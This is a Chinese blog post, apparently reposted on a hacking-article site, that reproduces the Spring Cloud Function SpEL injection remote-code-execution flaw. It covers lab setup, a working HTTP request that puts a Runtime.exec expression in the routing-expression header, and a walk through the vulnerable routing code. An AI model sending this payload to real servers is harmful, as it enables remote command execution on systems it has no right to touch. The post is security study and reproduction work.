记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Spring Cloud Function 漏洞复现

2022-03-27 23:56

一、环境搭建

https://codeload.github.com/spring-cloud/spring-cloud-function/zip/refs/tags/v3.2.0

下载当前的压缩包直接用IDEA 打开

spring-cloud-function-samples/function-sample-pojo  

就可以执行运行环境

进行访问

二、修改配置文件的RCE方式

然后随意路由

三、默认配置文件下的RCE

POST /functionRouter HTTP/1.1
Host: 192.168.66.101:8080
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc")

Content-Type: application/x-www-form-urlencoded
Content-Length: 5

test 

四、代码分析

从Test RoutingFunctionTests.java 

https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52

好像是调用apply 函数。传递了Message 类型的input 

那么从这里打断点

实际上触发的代码块为:

function = this.functionFromExpression((String)message.getHeaders().get("spring.cloud.function.routing-expression"), message);

往下更进

    private FunctionInvocationWrapper functionFromExpression(String routingExpression, Object input) {
        Expression expression = this.spelParser.parseExpression(routingExpression);
        String functionName = (String)expression.getValue(this.evalContext, input, String.class);
        Assert.hasText(functionName, "Failed to resolve function name based on routing expression '" + this.functionProperties.getRoutingExpression() + "'");
        FunctionInvocationWrapper function = (FunctionInvocationWrapper)this.functionCatalog.lookup(functionName);
        Assert.notNull(function, "Failed to lookup function to route to based on the expression '" + this.functionProperties.getRoutingExpression() + "' whcih resolved to '" + functionName + "' function name.");
        if (logger.isInfoEnabled()) {
            logger.info("Resolved function from provided [routing-expression]  " + routingExpression);
        }

        return function;
    }

调用的层次太过于深了。完全没有看懂他怎个流程。



参考:

https://mp.weixin.qq.com/s/ssHcLC72wZqzt-ei_ZoLwg

https://wx.zsxq.com/dweb2/index/topic_detail/184254458222452


知识来源: https://www.o2oxy.cn/4029.html

阅读:282975 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Spring Cloud Function 漏洞复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

标签云 ☁

本页关键词 💎